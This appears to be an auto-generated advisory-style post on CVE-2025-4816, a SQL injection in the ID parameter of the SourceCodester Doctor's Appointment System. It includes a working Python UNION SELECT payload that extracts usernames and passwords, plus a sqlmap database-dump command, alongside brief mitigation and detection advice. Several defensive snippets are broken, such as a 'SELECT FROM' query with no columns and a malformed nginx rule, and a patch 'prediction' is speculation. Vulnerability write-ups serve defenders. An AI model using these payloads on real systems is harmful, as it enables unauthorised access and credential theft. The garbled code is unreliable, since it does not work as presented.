SourceCodester Doctor’s Appointment System 10, SQL Injection, CVE-2025-4816 (Critical)

Listen to this Post

How CVE-2025-4816 Works

The vulnerability exists in `/admin/appointment.php` due to improper sanitization of the `ID` parameter in GET requests. Attackers can inject malicious SQL queries through this parameter, manipulating database operations. The system fails to apply prepared statements or input validation, allowing arbitrary SQL execution. Remote exploitation is possible without authentication, enabling data theft, manipulation, or denial of service. The CVSS 4.0 vector (AV:N/AC:L/PR:N/UI:N) confirms network-based exploitation with low attack complexity.

DailyCVE Form

Platform: SourceCodester
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-05-27

Prediction: Patch by 2025-06-20

What Undercode Say:

Exploitation

import requests
TARGET_URL = "http://target.com/admin/appointment.php"
PAYLOAD = "1' UNION SELECT 1,2,3,4,5,6,CONCAT(username,':',password),8 FROM users-- -"
response = requests.get(f"{TARGET_URL}?ID={PAYLOAD}")
print(response.text)

Protection

1. Input Validation:

if (!is_numeric($_GET['ID'])) { die("Invalid input"); }

2. Prepared Statements:

$stmt = $conn->prepare("SELECT FROM appointments WHERE id = ?");
$stmt->bind_param("i", $_GET['ID']);

3. WAF Rules:

location /admin {
deny all; Restrict unauthorized access
}

Analytics

  • Attack Surface: Remote, unauthenticated.
  • Exploitability: High (public PoC available).
  • Mitigation Complexity: Low (requires code fixes).

Detection

SELECT FROM logs WHERE request LIKE "%appointment.php?ID=%'%";

Post-Exploit

Dump database
sqlmap -u "http://target.com/admin/appointment.php?ID=1" --dbs

Patch Verification

// Verify patch:
$patched = strpos(file_get_contents("appointment.php"), "bind_param");
echo $patched ? "Patched" : "Vulnerable";

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top